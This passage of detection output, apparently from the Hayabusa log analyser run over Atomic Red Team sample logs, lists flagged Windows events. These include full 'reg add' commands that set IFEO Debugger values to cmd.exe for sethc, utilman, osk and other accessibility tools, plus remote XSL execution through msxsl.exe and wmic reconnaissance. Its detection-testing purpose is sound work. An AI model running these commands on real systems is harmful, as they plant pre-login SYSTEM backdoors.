747F3D96-D890-5D31-0000-001085443200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1228 | PGUID: 747F3D96-D89A-5D31-0000-0010A46B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D89A-5D31-0000-0010F56D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 3704 | PGUID: 
747F3D96-D89A-5D31-0000-0010F56D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1132 | PGUID: 747F3D96-D89A-5D31-0000-0010F2703200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 864 | PGUID: 747F3D96-D89F-5D31-0000-00106C7D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d 
C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1860 | PGUID: 747F3D96-D89F-5D31-0000-0010BD7F3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2404 | PGUID: 
747F3D96-D89F-5D31-0000-0010BC823200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D8A2-5D31-0000-00108A8F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 
747F3D96-D8A2-5D31-0000-0010D5913200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D8A2-5D31-0000-0010D8943200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t 
REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 
747F3D96-D8A5-5D31-0000-0010C0A03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 
747F3D96-D8A6-5D31-0000-0010A5A93200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6664 | PGUID: 747F3D96-D8A6-5D31-0000-0010F9B13200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v 
Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 
747F3D96-D8AA-5D31-0000-0010C0C93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 
747F3D96-D8AB-5D31-0000-0010A5D23200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D8D0-5D31-0000-001034673300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process 